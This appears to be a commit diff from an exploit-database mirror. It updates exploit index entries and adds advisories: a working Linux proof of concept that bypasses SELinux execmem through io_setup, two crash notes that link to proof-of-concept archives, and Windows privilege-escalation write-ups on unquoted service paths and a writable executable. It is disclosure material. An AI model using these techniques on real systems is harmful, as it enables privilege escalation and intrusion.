38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0
|
||||
38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0
|
||||
38335,platforms/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0
|
||||
38336,platforms/windows/dos/38336.py,"Git-1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
|
||||
38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
|
||||
38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
|
||||
38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80
|
||||
38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80
|
||||
|
@ -35256,7 +35261,7 @@ id,file,description,date,author,platform,type,port
|
|||
38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0
|
||||
38927,platforms/php/webapps/38927.txt,"iy10 Dizin Scripti - Multiple Vulnerabilities",2015-12-10,KnocKout,php,webapps,80
|
||||
38928,platforms/php/webapps/38928.txt,"Gökhan Balbal Script 2.0 - Cross-Site Request Forgery",2015-12-10,KnocKout,php,webapps,80
|
||||
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <=7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
|
||||
38929,platforms/hardware/webapps/38929.txt,"Skybox Platform <= 7.0.611 - Multiple Vulnerabilities",2015-12-10,"SEC Consult",hardware,webapps,8443
|
||||
38930,platforms/multiple/dos/38930.txt,"Rar - CmdExtract::UnstoreFile Integer Truncation Memory Corruption",2015-12-10,"Google Security Research",multiple,dos,0
|
||||
38931,platforms/multiple/dos/38931.txt,"Avast - OOB Write Decrypting PEncrypt Packed executables",2015-12-10,"Google Security Research",multiple,dos,0
|
||||
38932,platforms/multiple/dos/38932.txt,"Avast - JetDb::IsExploited4x Performs Unbounded Search on Input",2015-12-10,"Google Security Research",multiple,dos,0
|
||||
|
@ -35781,7 +35786,7 @@ id,file,description,date,author,platform,type,port
|
|||
39475,platforms/windows/dos/39475.py,"QuickHeal 16.00 - webssx.sys Driver Denial of Service",2016-02-19,"Fitzl Csaba",windows,dos,0
|
||||
39476,platforms/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",multiple,dos,0
|
||||
39477,platforms/windows/webapps/39477.txt,"ManageEngine Firewall Analyzer 8.5 - Multiple Vulnerabilities",2016-02-19,"Sachin Wagh",windows,webapps,8500
|
||||
39478,platforms/php/webapps/39478.txt,"SOLIDserver <=5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
|
||||
39478,platforms/php/webapps/39478.txt,"SOLIDserver <= 5.0.4 - Local File Inclusion",2016-02-20,"Saeed reza Zamanian",php,webapps,0
|
||||
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
|
||||
39481,platforms/java/webapps/39481.txt,"BlackBerry Enterprise Service < 12.4 (BES12) Self-Service - Multiple Vulnerabilities",2016-02-22,Security-Assessment.com,java,webapps,0
|
||||
39482,platforms/multiple/dos/39482.txt,"Wireshark - dissect_oml_attrs Static Out-of-Bounds Read",2016-02-22,"Google Security Research",multiple,dos,0
|
||||
|
@ -35851,7 +35856,7 @@ id,file,description,date,author,platform,type,port
|
|||
39550,platforms/multiple/dos/39550.py,"libotr 4.1.0 - Memory Corruption",2016-03-10,"X41 D-Sec GmbH",multiple,dos,0
|
||||
39551,platforms/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,multiple,dos,0
|
||||
39552,platforms/php/webapps/39552.txt,"WordPress Theme Beauty & Clean 1.0.8 - Arbitrary File Upload",2016-03-11,"Colette Chamberland",php,webapps,80
|
||||
39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
|
||||
39553,platforms/php/webapps/39553.txt,"WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
|
||||
39554,platforms/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80
|
||||
39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
|
||||
39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",linux,dos,0
|
||||
|
@ -36000,7 +36005,7 @@ id,file,description,date,author,platform,type,port
|
|||
39715,platforms/java/webapps/39715.rb,"Symantec Brightmail 10.6.0-7 - LDAP Credentials Disclosure (Metasploit)",2016-04-21,"Fakhir Karim Reda",java,webapps,443
|
||||
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
|
||||
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86-64 - bindshell (Port 5600) Shellcode (86 bytes)",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
|
||||
40094,platforms/win_x86/shellcode/40094.c,"Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)",2016-07-13,"Roziul Hasan Khan Shifat",win_x86,shellcode,0
|
||||
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,jsp,webapps,0
|
||||
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent Cross-Site Scripting",2016-04-25,Vulnerability-Lab,ios,webapps,0
|
||||
|
@ -36086,7 +36091,7 @@ id,file,description,date,author,platform,type,port
|
|||
39806,platforms/php/webapps/39806.txt,"WordPress Plugin Q and A (Focus Plus) FAQ 1.3.9.7 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39807,platforms/php/webapps/39807.txt,"WordPress Plugin Huge-IT Image Gallery 1.8.9 - Multiple Vulnerabilities",2016-05-12,"Gwendal Le Coguic",php,webapps,80
|
||||
39808,platforms/windows/webapps/39808.txt,"Trend Micro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
|
||||
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
|
||||
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
|
||||
39883,platforms/php/webapps/39883.txt,"WordPress Plugin Simple Backup 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
|
||||
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
|
||||
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
|
||||
|
@ -36342,7 +36347,7 @@ id,file,description,date,author,platform,type,port
|
|||
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
|
||||
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux/x86-64 - Continuously-Probing Reverse Shell via Socket + Port-range + Password Shellcode (172 bytes)",2016-07-11,Kyzer,lin_x86-64,shellcode,0
|
||||
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 / 11 - main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
|
||||
40107,platforms/windows/local/40107.rb,"Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
|
||||
40107,platforms/windows/local/40107.rb,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)",2016-07-13,Metasploit,windows,local,0
|
||||
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,linux,remote,443
|
||||
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
|
||||
40110,platforms/lin_x86/shellcode/40110.c,"Linux/x86 - Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10 Shellcode (68 bytes)",2016-07-13,RTV,lin_x86,shellcode,0
|
||||
|
|
Can't render this file because it is too large.
|
47
platforms/linux/dos/40419.c
Executable file
47
platforms/linux/dos/40419.c
Executable file
|
@ -0,0 +1,47 @@
|
|||
/*
|
||||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=854
|
||||
|
||||
SELinux has a set of permissions that can be used to prevent processes from creating executable
|
||||
memory mappings that contain data controlled by the process (PROCESS__EXECMEM, PROCESS__EXECHEAP, ...).
|
||||
These permissions, when applied correctly, make exploitation of memory corruption issues somewhat more
|
||||
difficult and much more annoying.
|
||||
|
||||
When a process tries to map memory using sys_mmap_pgoff(), vm_mmap_pgoff() is called, which first
|
||||
performs the LSM security check by calling security_mmap_file() and then calls do_mmap_pgoff(), which
|
||||
takes care of the rest and does not rerun the same security check.
|
||||
|
||||
The syscall handler for io_setup() calls ioctx_alloc(), which calls aio_setup_ring(), which allocates
|
||||
memory via do_mmap_pgoff() - the method that doesn't contain the security check.
|
||||
|
||||
aio_setup_ring() only requests that the memory is mapped as PROT_READ | PROT_WRITE; however, if the
|
||||
process has called personality(READ_IMPLIES_EXEC) before, this will actually result in the creation
|
||||
of a memory mapping that is both writable and executable, bypassing the SELinux restriction.
|
||||
|
||||
To verify: (note: I actually tested this without SELinux since the code looks pretty straightforward
|
||||
and I don't want to figure out how to set up SELinux rules)
|
||||
|
||||
$ cat > iosetup.c
|
||||
*/
|
||||
|
||||
#define _GNU_SOURCE
|
||||
#include <linux/aio_abi.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/syscall.h>
|
||||
#include <err.h>
|
||||
#include <sys/personality.h>
|
||||
|
||||
int main(void) {
|
||||
aio_context_t ctx;
|
||||
personality(READ_IMPLIES_EXEC);
|
||||
if (syscall(__NR_io_setup, 1, &ctx))
|
||||
err(1, "io_setup");
|
||||
while (1) pause();
|
||||
}
|
||||
|
||||
/*
|
||||
$ gcc -o iosetup iosetup.c
|
||||
$ ./iosetup &
|
||||
[1] 4949
|
||||
$ cat /proc/4949/maps | grep aio
|
||||
7fa0b59c6000-7fa0b59c7000 rwxs 00000000 00:0b 36093330 /[aio] (deleted)
|
||||
*/
|
9
platforms/multiple/dos/40420.txt
Executable file
9
platforms/multiple/dos/40420.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=857
|
||||
|
||||
The attached fuzz file causes memory corruption when decompressing embedded video content.
|
||||
|
||||
Fixed in the September update
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40420.zip
|
9
platforms/multiple/dos/40421.txt
Executable file
9
platforms/multiple/dos/40421.txt
Executable file
|
@ -0,0 +1,9 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=859
|
||||
|
||||
There is a crash when the AVC decoder attempts to free memory, likely indicating memory corruption.
|
||||
|
||||
Fixed in the September update
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40421.zip
|
60
platforms/windows/local/40417.txt
Executable file
60
platforms/windows/local/40417.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
# Exploit Title: Wisecleaner Software Multiple Unquoted Service Path Elevation of Privilege
|
||||
# Date: 23/09/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Vendor Homepage: http://www.wisecleaner.com
|
||||
# Software Link: http://www.wisecleaner.com/wise-disk-cleaner.html, http://www.wisecleaner.com/wise-care-365.html
|
||||
# Version: Wise Care 365 4.27, Wise Disk Cleaner 9.29
|
||||
# Tested on: Windows 7 x86
|
||||
# Shout-out to carbonated and ozzie_offsec
|
||||
|
||||
|
||||
1. Description:
|
||||
|
||||
Two seperate instances of unquoted service path privilege escalation has been discovered. The first instance is within Wise Care 365 4.27 which installs a vulnerable service entitled WiseBootAssistant. The second vulnerability exists when Wise Disk Cleaner 9.29 installs SpyHunter 4. Both of these services run with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
2. Proof
|
||||
|
||||
Wise Disk Cleaner 9.29
|
||||
|
||||
C:\>sc qc WiseBootAssistant
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: WiseBootAssistant
|
||||
TYPE : 110 WIN32_OWN_PROCESS (interactive)
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Wise\Wise Care 365\BootTime.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Wise Boot Assistant
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
SpyHunter 4
|
||||
|
||||
C:\>sc qc "SpyHunter 4 Service"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: SpyHunter 4 Service
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe
|
||||
LOAD_ORDER_GROUP : Base
|
||||
TAG : 0
|
||||
DISPLAY_NAME : SpyHunter 4 Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : LocalSystem
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
A successful attempt would require the local user to be able to insert their
|
||||
code in the system root path undetected by the OS or other security applications
|
||||
where it could potentially be executed during application startup or reboot.
|
||||
If successful, the local user's code would execute with the elevated privileges
|
||||
of the application.
|
||||
|
28
platforms/windows/local/40418.txt
Executable file
28
platforms/windows/local/40418.txt
Executable file
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: Zortam Mp3 Media Studio 21.15 Insecure File Permissions Privilege Escalation
|
||||
# Date: 23/09/2016
|
||||
# Exploit Author: Tulpa
|
||||
# Contact: tulpa@tulpa-security.com
|
||||
# Author website: www.tulpa-security.com
|
||||
# Vendor Homepage: http://www.zortam.com/
|
||||
# Software Link: http://www.zortam.com/download.html
|
||||
# Version: Software Version 21.15
|
||||
# Tested on: Windows 10 Professional x64, Windows XP SP3 x86, Windows Server 2008 R2 x64
|
||||
# Shout-out to carbonated and ozzie_offsec
|
||||
|
||||
1. Description:
|
||||
|
||||
Zortam Mp3 Media Studio installs by default to "C:\Program Files (x86)\Zortam Mp3 Media Studio\zmmspro.exe" with very weak file permissions granting any user full permission to the exe. This allows opportunity for code execution against any other user running the application.
|
||||
|
||||
2. Proof
|
||||
|
||||
C:\Program Files\Zortam Mp3 Media Studio>cacls zmmspro.exe
|
||||
C:\Program Files\Zortam Mp3 Media Studio\zmmspro.exe BUILTIN\Users:F
|
||||
NT AUTHORITY\SYSTEM:(ID)F
|
||||
BUILTIN\Administrators:(ID)F
|
||||
BUILTIN\Users:(ID)R
|
||||
|
||||
|
||||
3. Exploit:
|
||||
|
||||
Simply replace zmmspro.exe and wait for execution.
|
||||
|
Loading…
Add table
Reference in a new issue